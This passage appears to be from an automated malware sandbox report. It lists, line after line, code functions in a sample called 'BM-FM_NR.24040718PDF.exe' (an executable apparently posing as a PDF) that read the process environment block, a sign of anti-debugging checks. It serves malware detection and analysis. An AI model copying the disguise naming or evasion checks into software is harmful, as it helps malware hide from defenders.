        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8B58B mov eax, dword ptr fs:[00000030h]2_2_36B8B58B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8B58B mov eax, dword ptr fs:[00000030h]2_2_36B8B58B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8B58B mov eax, dword ptr fs:[00000030h]2_2_36B8B58B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F582 mov eax, dword ptr fs:[00000030h]2_2_36B9F582
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]2_2_36AEB5E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]2_2_36AEB5E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]2_2_36AEB5E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]2_2_36AEB5E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]2_2_36AEB5E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]2_2_36AEB5E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B655E0 mov eax, dword ptr fs:[00000030h]2_2_36B655E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B115EF mov eax, dword ptr fs:[00000030h]2_2_36B115EF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6B5D3 mov eax, dword ptr fs:[00000030h]2_2_36B6B5D3
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB753C mov eax, dword ptr fs:[00000030h]2_2_36BB753C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB753C mov ecx, dword ptr fs:[00000030h]2_2_36BB753C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB753C mov eax, dword ptr fs:[00000030h]2_2_36BB753C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1F523 mov eax, dword ptr fs:[00000030h]2_2_36B1F523
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD753F mov eax, dword ptr fs:[00000030h]2_2_36AD753F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD753F mov eax, dword ptr fs:[00000030h]2_2_36AD753F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD753F mov eax, dword ptr fs:[00000030h]2_2_36AD753F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B11527 mov eax, dword ptr fs:[00000030h]2_2_36B11527
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE3536 mov eax, dword ptr fs:[00000030h]2_2_36AE3536
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE3536 mov eax, dword ptr fs:[00000030h]2_2_36AE3536
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov ecx, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov ecx, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h]2_2_36B01514
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h]2_2_36B01514
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h]2_2_36B01514
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h]2_2_36B01514
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h]2_2_36B01514
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h]2_2_36B01514
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB502 mov eax, dword ptr fs:[00000030h]2_2_36ADB502
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9550D mov eax, dword ptr fs:[00000030h]2_2_36B9550D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9550D mov eax, dword ptr fs:[00000030h]2_2_36B9550D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9550D mov eax, dword ptr fs:[00000030h]2_2_36B9550D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B69567 mov eax, dword ptr fs:[00000030h]2_2_36B69567
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9B56E mov eax, dword ptr fs:[00000030h]2_2_36B9B56E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9B56E mov ecx, dword ptr fs:[00000030h]2_2_36B9B56E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9B56E mov eax, dword ptr fs:[00000030h]2_2_36B9B56E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBB55F mov eax, dword ptr fs:[00000030h]2_2_36BBB55F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBB55F mov eax, dword ptr fs:[00000030h]2_2_36BBB55F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD92AF mov eax, dword ptr fs:[00000030h]2_2_36AD92AF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h]2_2_36BBB2BC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h]2_2_36BBB2BC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h]2_2_36BBB2BC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h]2_2_36BBB2BC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA92AB mov eax, dword ptr fs:[00000030h]2_2_36BA92AB
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F2AE mov eax, dword ptr fs:[00000030h]2_2_36B9F2AE
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE7290 mov eax, dword ptr fs:[00000030h]2_2_36AE7290
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE7290 mov eax, dword ptr fs:[00000030h]2_2_36AE7290
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE7290 mov eax, dword ptr fs:[00000030h]2_2_36AE7290
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADD2EC mov eax, dword ptr fs:[00000030h]2_2_36ADD2EC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADD2EC mov eax, dword ptr fs:[00000030h]2_2_36ADD2EC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD72E0 mov eax, dword ptr fs:[00000030h]2_2_36AD72E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h]2_2_36B832DF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h]2_2_36B832DF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h]2_2_36B832DF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h]2_2_36B832DF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h]2_2_36B832DF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B132C0 mov eax, dword ptr fs:[00000030h]2_2_36B132C0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B132C0 mov eax, dword ptr fs:[00000030h]2_2_36B132C0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB32C9 mov eax, dword ptr fs:[00000030h]2_2_36BB32C9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B032C5 mov eax, dword ptr fs:[00000030h]2_2_36B032C5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6B214 mov eax, dword ptr fs:[00000030h]2_2_36B6B214
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6B214 mov eax, dword ptr fs:[00000030h]2_2_36B6B214
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9D270 mov eax, dword ptr fs:[00000030h]2_2_36B9D270
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h]2_2_36B7327E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h]2_2_36B7327E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h]2_2_36B7327E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h]2_2_36B7327E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h]2_2_36B7327E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h]2_2_36B7327E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB273 mov eax, dword ptr fs:[00000030h]2_2_36ADB273
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB273 mov eax, dword ptr fs:[00000030h]2_2_36ADB273
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB273 mov eax, dword ptr fs:[00000030h]2_2_36ADB273
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5D250 mov eax, dword ptr fs:[00000030h]2_2_36B5D250
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5D250 mov ecx, dword ptr fs:[00000030h]2_2_36B5D250
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h]2_2_36BA124C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h]2_2_36BA124C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h]2_2_36BA124C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h]2_2_36BA124C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F24A mov eax, dword ptr fs:[00000030h]2_2_36B0F24A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F247 mov eax, dword ptr fs:[00000030h]2_2_36B9F247
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE93A6 mov eax, dword ptr fs:[00000030h]2_2_36AE93A6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE93A6 mov eax, dword ptr fs:[00000030h]2_2_36AE93A6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B81390 mov eax, dword ptr fs:[00000030h]2_2_36B81390
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B81390 mov eax, dword ptr fs:[00000030h]2_2_36B81390
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h]2_2_36AE1380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h]2_2_36AE1380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h]2_2_36AE1380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h]2_2_36AE1380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h]2_2_36AE1380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h]2_2_36AFF380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h]2_2_36AFF380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h]2_2_36AFF380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h]2_2_36AFF380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h]2_2_36AFF380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h]2_2_36AFF380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F38A mov eax, dword ptr fs:[00000030h]2_2_36B9F38A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B133D0 mov eax, dword ptr fs:[00000030h]2_2_36B133D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9D330 mov eax, dword ptr fs:[00000030h]2_2_36B9D330
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9D330 mov eax, dword ptr fs:[00000030h]2_2_36B9D330
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB3336 mov eax, dword ptr fs:[00000030h]2_2_36BB3336
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0332D mov eax, dword ptr fs:[00000030h]2_2_36B0332D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD9303 mov eax, dword ptr fs:[00000030h]2_2_36AD9303
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD9303 mov eax, dword ptr fs:[00000030h]2_2_36AD9303
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F30A mov eax, dword ptr fs:[00000030h]2_2_36B9F30A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h]2_2_36B6330C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h]2_2_36B6330C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h]2_2_36B6330C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h]2_2_36B6330C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h]2_2_36AEB360
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h]2_2_36AEB360
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h]2_2_36AEB360
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h]2_2_36AEB360
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h]2_2_36AEB360
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h]2_2_36AEB360
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB50B7 mov eax, dword ptr fs:[00000030h]2_2_36BB50B7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9B0AF mov eax, dword ptr fs:[00000030h]2_2_36B9B0AF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]2_2_36B8F0A5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]2_2_36B8F0A5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]2_2_36B8F0A5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]2_2_36B8F0A5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]2_2_36B8F0A5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]2_2_36B8F0A5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]2_2_36B8F0A5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B67090 mov eax, dword ptr fs:[00000030h]2_2_36B67090
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1D0F0 mov eax, dword ptr fs:[00000030h]2_2_36B1D0F0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1D0F0 mov ecx, dword ptr fs:[00000030h]2_2_36B1D0F0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h]2_2_36AD90F8
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h]2_2_36AD90F8
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h]2_2_36AD90F8
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h]2_2_36AD90F8
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8B0D0 mov eax, dword ptr fs:[00000030h]2_2_36B8B0D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8B0D0 mov eax, dword ptr fs:[00000030h]2_2_36B8B0D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8B0D0 mov eax, dword ptr fs:[00000030h]2_2_36B8B0D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h]2_2_36ADB0D6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h]2_2_36ADB0D6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h]2_2_36ADB0D6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h]2_2_36ADB0D6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFB0D0 mov eax, dword ptr fs:[00000030h]2_2_36AFB0D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADD02D mov eax, dword ptr fs:[00000030h]2_2_36ADD02D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B87030 mov eax, dword ptr fs:[00000030h]2_2_36B87030
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B05004 mov eax, dword ptr fs:[00000030h]2_2_36B05004
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B05004 mov ecx, dword ptr fs:[00000030h]2_2_36B05004
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB1076 mov eax, dword ptr fs:[00000030h]2_2_36BB1076
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB1076 mov eax, dword ptr fs:[00000030h]2_2_36BB1076
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B89060 mov eax, dword ptr fs:[00000030h]2_2_36B89060
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE7072 mov eax, dword ptr fs:[00000030h]2_2_36AE7072
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB505B mov eax, dword ptr fs:[00000030h]2_2_36BB505B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE1051 mov eax, dword ptr fs:[00000030h]2_2_36AE1051
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE1051 mov eax, dword ptr fs:[00000030h]2_2_36AE1051
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB51B6 mov eax, dword ptr fs:[00000030h]2_2_36BB51B6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B131BE mov eax, dword ptr fs:[00000030h]2_2_36B131BE
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B131BE mov eax, dword ptr fs:[00000030h]2_2_36B131BE
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B21190 mov eax, dword ptr fs:[00000030h]2_2_36B21190
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B21190 mov eax, dword ptr fs:[00000030h]2_2_36B21190
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B09194 mov eax, dword ptr fs:[00000030h]2_2_36B09194
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F1F0 mov eax, dword ptr fs:[00000030h]2_2_36B0F1F0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F1F0 mov eax, dword ptr fs:[00000030h]2_2_36B0F1F0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7D1F0 mov eax, dword ptr fs:[00000030h]2_2_36B7D1F0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE91E5 mov eax, dword ptr fs:[00000030h]2_2_36AE91E5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE91E5 mov eax, dword ptr fs:[00000030h]2_2_36AE91E5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h]2_2_36B0B1E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h]2_2_36B0B1E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h]2_2_36B0B1E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h]2_2_36B0B1E0
